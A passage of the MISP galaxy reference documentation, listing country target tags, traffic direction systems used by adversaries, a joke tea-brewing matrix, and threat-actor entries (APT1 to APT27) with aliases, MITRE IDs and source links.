Tokelau is also known as:

  • Union Islands

  • Tokelau Islands

Tonga

The tag is: misp-galaxy:target-information="Tonga"

Tonga is also known as:

  • Kingdom of Tonga

  • Puleʻanga Fakatuʻi ʻo Tonga

Trinidad and Tobago

The tag is: misp-galaxy:target-information="Trinidad and Tobago"

Trinidad and Tobago is also known as:

  • Republic of Trinidad and Tobago

Tunisia

The tag is: misp-galaxy:target-information="Tunisia"

Tunisia is also known as:

  • تونس

  • Republic of Tunisia

  • الجمهورية التونسية

  • al-Jumhūrīyah at-Tūnisīyah

  • République tunisienne

Turkey

The tag is: misp-galaxy:target-information="Turkey"

Turkey is also known as:

  • Türkiye

  • Republic of Turkey

  • Türkiye Cumhuriyeti

Turkmenistan

The tag is: misp-galaxy:target-information="Turkmenistan"

Turkmenistan is also known as:

  • Türkmenistan

Turks and Caicos Islands

The tag is: misp-galaxy:target-information="Turks and Caicos Islands"

Turks and Caicos Islands is also known as:

  • TCI

Tuvalu

The tag is: misp-galaxy:target-information="Tuvalu"

Tuvalu is also known as:

  • Ellice Islands

U.S. Virgin Islands

The tag is: misp-galaxy:target-information="U.S. Virgin Islands"

U.S. Virgin Islands is also known as:

  • United States Virgin Islands

  • USVI

  • American Virgin Islands

  • Virgin Islands of the United States

Uganda

The tag is: misp-galaxy:target-information="Uganda"

Uganda is also known as:

  • Republic of Uganda[

  • Jamhuri ya Uganda

Ukraine

The tag is: misp-galaxy:target-information="Ukraine"

Ukraine is also known as:

  • Україна

  • Ukrayina

United Arab Emirates

The tag is: misp-galaxy:target-information="United Arab Emirates"

United Arab Emirates is also known as:

  • UAE

  • الإمارات العربية المتحدة

  • al-ʾImārāt al-ʿArabīyyah al-Muttaḥidah

  • Emirates

  • الإمارات‎

  • al-ʾImārāt

United Kingdom

The tag is: misp-galaxy:target-information="United Kingdom"

United Kingdom is also known as:

  • United Kingdom of Great Britain and Northern Ireland

  • UK

  • U.K.

  • Britain

United States

The tag is: misp-galaxy:target-information="United States"

United States is also known as:

  • United States of America

  • USA

  • U.S.

  • US

  • America

Uruguay

The tag is: misp-galaxy:target-information="Uruguay"

Uruguay is also known as:

  • Oriental Republic of Uruguay

  • República Oriental del Uruguay

  • República Oriental do Uruguai

Uzbekistan

The tag is: misp-galaxy:target-information="Uzbekistan"

Uzbekistan is also known as:

  • O’zbekiston

  • Ўзбекистон

  • Republic of Uzbekistan

  • O’zbekiston Respublikasi

  • Ўзбекистон Республикаси

Vanuatu

The tag is: misp-galaxy:target-information="Vanuatu"

Vanuatu is also known as:

  • Republic of Vanuatu

  • Ripablik blong Vanuatu

  • République de Vanuatu

Vatican

The tag is: misp-galaxy:target-information="Vatican"

Vatican is also known as:

  • Vatican City

  • Vatican City State

  • Status Civitatis Vaticanae

  • Stato della Città del Vaticano

Venezuela

The tag is: misp-galaxy:target-information="Venezuela"

Venezuela is also known as:

  • Bolivarian Republic of Venezuela

  • República Bolivariana de Venezuela

Vietnam

The tag is: misp-galaxy:target-information="Vietnam"

Vietnam is also known as:

  • Việt Nam

  • Socialist Republic of Vietnam

  • Cộng hòa xã hội chủ nghĩa Việt Nam

Wallis and Futuna

The tag is: misp-galaxy:target-information="Wallis and Futuna"

Wallis and Futuna is also known as:

  • Territory of the Wallis and Futuna Islands

  • Wallis-et-Futuna

  • Territoire des îles Wallis-et-Futuna

  • Uvea mo Futuna

  • Telituale o Uvea mo Futuna

Western Sahara

The tag is: misp-galaxy:target-information="Western Sahara"

Western Sahara is also known as:

  • الصحراء الغربية

  • aṣ-Ṣaḥrā' al-Gharbīyah

  • Taneẓroft Tutrimt

  • Sahara Occidental

Yemen

The tag is: misp-galaxy:target-information="Yemen"

Yemen is also known as:

  • ٱلْيَمَن‎

  • al-Yaman

  • Republic of Yemen

  • ٱلْجُمْهُورِيَّة ٱلْيَمَنِيَّة

  • al-Jumhūrīyah al-Yamanīyah

  • Yemeni Republic

Zambia

The tag is: misp-galaxy:target-information="Zambia"

Zambia is also known as:

  • Republic of Zambia

Zimbabwe

The tag is: misp-galaxy:target-information="Zimbabwe"

Zimbabwe is also known as:

  • Rhodesia

  • Republic of Zimbabwe

  • Nyika yeZimbabwe

  • Ilizwe leZimbabwe

  • Dziko la Zimbabwe

  • Hango yeZimbabwe

  • Zimbabwe Nù

  • Inyika yeZimbabwe

  • Tiko ra Zimbabwe

  • Naha ya Zimbabwe

  • Cisi ca Zimbabwe

  • Shango ḽa Zimbabwe

TDS

TDS is a list of Traffic Direction System used by adversaries.

TDS is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Kafeine

Keitaro

Keitaro TDS is among the mostly used TDS in drive by infection chains

The tag is: misp-galaxy:tds="Keitaro"

Table 11761. Table References

Links

https://keitarotds.com/

BlackTDS

BlackTDS is mutualised TDS advertised underground since end of December 2017

The tag is: misp-galaxy:tds="BlackTDS"

Table 11762. Table References

Links

.com/[https://blacktds[.com/

ShadowTDS

ShadowTDS is advertised underground since 2016-02. It’s in fact more like a Social Engineering kit focused on Android and embedding a TDS

The tag is: misp-galaxy:tds="ShadowTDS"

Sutra

Sutra TDS was dominant from 2012 till 2015

The tag is: misp-galaxy:tds="Sutra"

Table 11763. Table References

Links

http://kytoon.com/sutra-tds.html

SimpleTDS

SimpleTDS is a basic open source TDS

The tag is: misp-galaxy:tds="SimpleTDS"

SimpleTDS is also known as:

  • Stds

Table 11764. Table References

Links

https://sourceforge.net/projects/simpletds/

zTDS

zTDS is an open source TDS

The tag is: misp-galaxy:tds="zTDS"

Table 11765. Table References

Links

http://ztds.info/doku.php

BossTDS

BossTDS

The tag is: misp-galaxy:tds="BossTDS"

Table 11766. Table References

Links

http://bosstds.com/

BlackHat TDS

BlackHat TDS is sold underground.

The tag is: misp-galaxy:tds="BlackHat TDS"

Table 11767. Table References

Links

http://malware.dontneedcoffee.com/2014/04/meet-blackhat-tds.html

Futuristic TDS

Futuristic TDS is the TDS component of BlackOS/CookieBomb/NorthTale Iframer

The tag is: misp-galaxy:tds="Futuristic TDS"

Orchid TDS

Orchid TDS was sold underground. Rare usage

The tag is: misp-galaxy:tds="Orchid TDS"

404 TDS

Proofpoint has tracked the 404 TDS since at least September 2022. Proofpoint is not aware if this is a service sold on underground forums, but it is likely a shared or sold tool due to its involvement in a variety of phishing and malware campaigns.

The tag is: misp-galaxy:tds="404 TDS"

Table 11768. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Tea Matrix

Tea Matrix.

Tea Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Alexandre Dulaunoy

Multi infusion

Multi infusion is allow and recommended

The tag is: misp-galaxy:tea-matrix="Multi infusion"

Single infusion

Single infusion is recommended

The tag is: misp-galaxy:tea-matrix="Single infusion"

Water temp 90-95 degC

Water temperature 90-95 degC

The tag is: misp-galaxy:tea-matrix="Water temp 90-95 degC"

Water temp 80 degC

Water temperature 80 degC

The tag is: misp-galaxy:tea-matrix="Water temp 80 degC"

Brewing time 2-3 min

Brewing time 2-3 minutes

The tag is: misp-galaxy:tea-matrix="Brewing time 2-3 min"

Brewing time 3-4 min

Brewing time 3-4 minutes

The tag is: misp-galaxy:tea-matrix="Brewing time 3-4 min"

Milk in tea

Milk in tea

The tag is: misp-galaxy:tea-matrix="Milk in tea"

Threat Actor

Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. threat-actor-classification meta can be used to clarify the understanding of the threat-actor if also considered as operation, campaign or activity group..

Threat Actor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Alexandre Dulaunoy - Florian Roth - Thomas Schreck - Timo Steffens - Various

APT1

PLA Unit 61398 (Chinese: 61398部队, Pinyin: 61398 bùduì) is the Military Unit Cover Designator (MUCD)[1] of a People’s Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks

The tag is: misp-galaxy:threat-actor="APT1"

APT1 is also known as:

  • COMMENT PANDA

  • PLA Unit 61398

  • Comment Crew

  • Byzantine Candor

  • Group 3

  • TG-8223

  • Comment Group

  • Brown Fox

  • GIF89a

  • ShadyRAT

  • G0006

APT1 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT1 - G0006" with estimative-language:likelihood-probability="likely"

Table 11769. Table References

Links

https://en.wikipedia.org/wiki/PLA_Unit_61398

http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf

https://www.cfr.org/interactive/cyber-operations/pla-unit-61398

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a-new-targeted-attack-awakens/

https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=f1265df5-6e5e-4fcc-9828-d4ddbbafd3d7&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://attack.mitre.org/groups/G0006/

https://www.nytimes.com/2014/05/20/us/us-to-charge-chinese-workers-with-cyberspying.html

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

Nitro

These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.

The tag is: misp-galaxy:threat-actor="Nitro"

Nitro is also known as:

  • Covert Grove

Table 11770. Table References

Links

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf

https://unit42.paloaltonetworks.com/new-indicators-compromise-apt-group-nitro-uncovered/

https://blog.trendmicro.com/trendlabs-security-intelligence/the-significance-of-the-nitro-attacks/

Dust Storm

Threat actors behind the Operation Dust Storm have been active since at least 2010, the hackers targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.

The tag is: misp-galaxy:threat-actor="Dust Storm"

Dust Storm is also known as:

  • G0031

Dust Storm has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Dust Storm - G0031" with estimative-language:likelihood-probability="likely"

Table 11771. Table References

Links

https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack

https://attack.mitre.org/groups/G0031/

WET PANDA

The tag is: misp-galaxy:threat-actor="WET PANDA"

WET PANDA is also known as:

  • Red Chimera

Table 11772. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

FOXY PANDA

Adversary group targeting telecommunication and technology organizations.

The tag is: misp-galaxy:threat-actor="FOXY PANDA"

Table 11773. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182276.pdf

PREDATOR PANDA

The tag is: misp-galaxy:threat-actor="PREDATOR PANDA"

Table 11774. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

UNION PANDA

The tag is: misp-galaxy:threat-actor="UNION PANDA"

Table 11775. Table References

Links

https://dokumen.tips/documents/detecting-and-responding-pandas-and-bears.html

SPICY PANDA

The tag is: misp-galaxy:threat-actor="SPICY PANDA"

Table 11776. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

ELOQUENT PANDA

The tag is: misp-galaxy:threat-actor="ELOQUENT PANDA"

Table 11777. Table References

Links

https://dokumen.tips/documents/detecting-and-responding-pandas-and-bears.html

DIZZY PANDA

The tag is: misp-galaxy:threat-actor="DIZZY PANDA"

DIZZY PANDA is also known as:

  • LadyBoyle

Grayling

Grayling activity was first observed in early 2023, when a number of victims were identified with distinctive malicious DLL side-loading activity. Grayling appears to target organisations in Asia, however one unknown organisation in the United States was also targeted. Industries targeted include Biomedical, Government and Information Technology. Grayling use a variety of tools during their attacks, including well known tools such as Cobalt Strike and Havoc and also some others.

The tag is: misp-galaxy:threat-actor="Grayling"

Table 11778. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

APT2

Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'

The tag is: misp-galaxy:threat-actor="APT2"

APT2 is also known as:

  • PLA Unit 61486

  • PUTTER PANDA

  • MSUpdater

  • 4HCrew

  • SULPHUR

  • SearchFire

  • TG-6952

  • G0024

APT2 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Putter Panda - G0024" with estimative-language:likelihood-probability="likely"

Table 11779. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://www.cfr.org/interactive/cyber-operations/putter-panda

https://attack.mitre.org/groups/G0024

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

APT3

Symantec described UPS in 2016 report as: 'Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Traditionally, the group attacked organizations in the US as well as other targets. However, Buckeyes focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.'

The tag is: misp-galaxy:threat-actor="APT3"

APT3 is also known as:

  • GOTHIC PANDA

  • TG-0110

  • Group 6

  • UPS

  • Buckeye

  • Boyusec

  • BORON

  • BRONZE MAYFAIR

  • Red Sylvan

APT3 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT3 - G0022" with estimative-language:likelihood-probability="likely"

Table 11780. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://www.cfr.org/interactive/cyber-operations/apt-3

https://www.secureworks.com/research/threat-profiles/bronze-mayfair

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

DarkHotel

Kaspersky described DarkHotel in a 2014 report as: '…​ DarkHotel drives its campaigns by spear-phishing targets with highly advanced Flash zero-day exploits that effectively evade the latest Windows and Adobe defenses, and yet they also imprecisely spread among large numbers of vague targets with peer-to-peer spreading tactics. Moreover, this crews most unusual characteristic is that for several years the Darkhotel APT has maintained a capability to use hotel networks to follow and hit selected targets as they travel around the world.'

The tag is: misp-galaxy:threat-actor="DarkHotel"

DarkHotel is also known as:

  • DUBNIUM

  • Fallout Team

  • Karba

  • Luder

  • Nemim

  • Nemin

  • Tapaoux

  • Pioneer

  • Shadow Crane

  • APT-C-06

  • SIG25

  • TUNGSTEN BRIDGE

  • T-APT-02

  • G0012

  • ATK52

  • Zigzag Hail

DarkHotel has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="DUBNIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Zigzag Hail" with estimative-language:likelihood-probability="likely"

Table 11781. Table References

Links

https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/

https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2

https://securelist.com/blog/research/66779/the-darkhotel-apt/

https://securelist.com/the-darkhotel-apt/66779/

https://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726

https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/

https://www.cfr.org/interactive/cyber-operations/darkhotel

https://www.securityweek.com/darkhotel-apt-uses-new-methods-target-politicians

https://attack.mitre.org/groups/G0012/

https://www.secureworks.com/research/threat-profiles/tungsten-bridge

https://www.antiy.cn/research/notice&report/research_report/20200522.html

APT12

A group of China-based attackers, who conducted a number of spear phishing attacks in 2013.

The tag is: misp-galaxy:threat-actor="APT12"

APT12 is also known as:

  • NUMBERED PANDA

  • TG-2754

  • BeeBus

  • Group 22

  • DynCalc

  • Calc Team

  • DNSCalc

  • Crimson Iron

  • IXESHE

  • BRONZE GLOBE

APT12 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT12 - G0005" with estimative-language:likelihood-probability="likely"

Table 11782. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

https://www.cfr.org/interactive/cyber-operations/apt-12

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

https://www.secureworks.com/research/threat-profiles/bronze-globe

https://www.mandiant.com/resources/insights/apt-groups

APT16

Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear-phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.

The tag is: misp-galaxy:threat-actor="APT16"

APT16 is also known as:

  • SVCMONDR

  • G0023

Table 11783. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html

https://www.cfr.org/interactive/cyber-operations/apt-16

https://attack.mitre.org/groups/G0023

https://www.mandiant.com/resources/insights/apt-groups

https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/

APT17

FireEye described APT17 in a 2015 report as: 'APT17, also known as DeputyDog, is a China based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.'

The tag is: misp-galaxy:threat-actor="APT17"

APT17 is also known as:

  • Group 8

  • AURORA PANDA

  • Hidden Lynx

  • Tailgater Team

  • Dogfish

  • BRONZE KEYSTONE

  • G0025

  • Group 72

  • G0001

  • Axiom

  • HELIUM

APT17 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT17 - G0025" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

Table 11784. Table References

Links

https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf

https://www.cfr.org/interactive/cyber-operations/apt-17

https://www.carbonblack.com/2013/02/08/bit9-and-our-customers-security/

https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware

https://web.archive.org/web/20130920000343/https://www.symantec.com/connect/blogs/hidden-lynx-professional-hackers-hire

https://www.recordedfuture.com/hidden-lynx-analysis/

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://attack.mitre.org/groups/G0025/

https://cfr.org/cyber-operations/axiom

https://attack.mitre.org/groups/G0001/

https://www.youtube.com/watch?v=NFJqD-LcpIg

https://www.mandiant.com/resources/insights/apt-groups

APT18

Wekby was described by Palo Alto Networks in a 2015 report as: 'Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeams Flash zero - day exploit.'

The tag is: misp-galaxy:threat-actor="APT18"

APT18 is also known as:

  • DYNAMITE PANDA

  • TG-0416

  • SCANDIUM

  • PLA Navy

  • Wekby

  • G0026

APT18 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT18 - G0026" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="SAMURAI PANDA" with estimative-language:likelihood-probability="likely"

Table 11785. Table References

Links

https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828

https://www.cfr.org/interactive/cyber-operations/apt-18

https://attack.mitre.org/groups/G0026

https://www.mandiant.com/resources/insights/apt-groups

APT19

Adversary group targeting financial, technology, non-profit organisations.

The tag is: misp-galaxy:threat-actor="APT19"

APT19 is also known as:

  • DEEP PANDA

  • Codoso

  • WebMasters

  • KungFu Kittens

  • Black Vine

  • TEMP.Avengers

  • Group 13

  • PinkPanther

  • Shell Crew

  • BRONZE FIRESTONE

  • G0009

  • G0073

  • Pupa

  • Sunshop Group

APT19 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Deep Panda - G0009" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT19 - G0073" with estimative-language:likelihood-probability="likely"

Table 11786. Table References

Links

http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

https://www.cfr.org/interactive/cyber-operations/deep-panda

https://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/

https://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/

https://www.crowdstrike.com/blog/department-labor-strategic-web-compromise/

https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/

https://krebsonsecurity.com/2015/06/catching-up-on-the-opm-breach/

https://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/

https://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/

https://www.crowdstrike.com/blog/ironman-deep-panda-uses-sakula-malware-target-organizations-multiple-sectors/

https://www.abc.net.au/news/2014-11-13/g20-china-affliliated-hackers-breaches-australian-media/5889442

https://www.washingtonpost.com/business/economy/keypoint-suffers-network-breach-thousands-of-fed-workers-could-be-affected/2014/12/18/e6c7146c-86e1-11e4-a702-fa31ff4ae98e_story.html

https://www.seattletimes.com/business/local-business/feds-warned-premera-about-security-flaws-before-breach/

https://krebsonsecurity.com/2015/05/carefirst-blue-cross-breach-hits-1-1m/

https://threatvector.cylance.com/en_us/home/shell-crew-variants-continue-to-fly-under-big-avs-radar.html

https://www.bleepingcomputer.com/news/security/us-arrests-chinese-man-involved-with-sakula-malware-used-in-opm-and-anthem-hacks/

https://gizmodo.com/u-s-indicts-chinese-hacker-spies-in-conspiracy-to-stea-1830111695

https://www.cyberscoop.com/anthem-breach-indictment-chinese-national/

https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group

https://attack.mitre.org/groups/G0009/

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/

https://www.nytimes.com/2016/06/12/technology/the-chinese-hackers-in-the-back-office.html

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

https://www.mandiant.com/resources/insights/apt-groups

https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel

https://www.youtube.com/watch?v=FC9ARZIZglI

Naikon

Kaspersky described Naikon in a 2015 report as: 'The Naikon group is mostly active in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, and Nepal, hitting a variety of targets in a very opportunistic way.'

The tag is: misp-galaxy:threat-actor="Naikon"

Naikon is also known as:

  • PLA Unit 78020

  • OVERRIDE PANDA

  • Camerashy

  • BRONZE GENEVA

  • G0019

  • Naikon

  • BRONZE STERLING

  • G0013

Naikon has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Naikon - G0019" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT30 - G0013" with estimative-language:likelihood-probability="likely"

Table 11787. Table References

Links

https://securelist.com/analysis/publications/69953/the-naikon-apt/

https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

https://usa.kaspersky.com/resource-center/threats/naikon-targeted-attacks

https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

https://threatconnect.com/blog/tag/naikon/

https://attack.mitre.org/groups/G0019/

https://www.secureworks.com/research/threat-profiles/bronze-geneva

https://cyware.com/news/chinese-naikon-group-back-with-new-espionage-attack-66a8413d

https://cluster25.io/2022/04/29/lotus-panda-awake-last-strike/

https://www.mandiant.com/resources/insights/apt-groups

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

APT30

APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches

The tag is: misp-galaxy:threat-actor="APT30"

APT30 is also known as:

  • G0013

APT30 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Raspberry Typhoon" with estimative-language:likelihood-probability="likely"

Table 11788. Table References

Links

https://attack.mitre.org/wiki/Group/G0013

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

https://www.mandiant.com/resources/insights/apt-groups

HURRICANE PANDA

We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA’s preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky to have caught an administrator who might be logged into that web server at the time, they will have gained domain administrator credentials and can now roam your network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.

The tag is: misp-galaxy:threat-actor="HURRICANE PANDA"

Table 11790. Table References

Links

http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/

https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/

https://www.crowdstrike.com/blog/storm-chasing/

https://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/

APT27

A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.

The tag is: misp-galaxy:threat-actor="APT27"

APT27 is also known as:

  • GreedyTaotie

  • TG-3390

  • EMISSARY PANDA

  • TEMP.Hippo

  • Red Phoenix

  • Budworm

  • Group 35

  • ZipToken

  • Iron Tiger

  • BRONZE UNION

  • Lucky Mouse

  • G0027

  • Iron Taurus

  • Earth Smilodon

APT27 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Threat Group-3390 - G0027" with estimative-language:likelihood-probability="likely"

Table 11791. Table References

Links

https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf

https://web.archive.org/web/20140129192702/https://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/

https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/

https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf

https://www.cfr.org/interactive/cyber-operations/iron-tiger

https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-hacked-government-data-center/

https://www.secureworks.com/research/bronze-union

http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/

https://securelist.com/luckymouse-ndisproxy-driver/87914/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.09.17.Operation_Iron_Tiger/Operation%20Iron%20Tiger%20Appendix.pdf

https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://attack.mitre.org/groups/G0027/

https://www.secureworks.com/research/threat-profiles/bronze-union

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

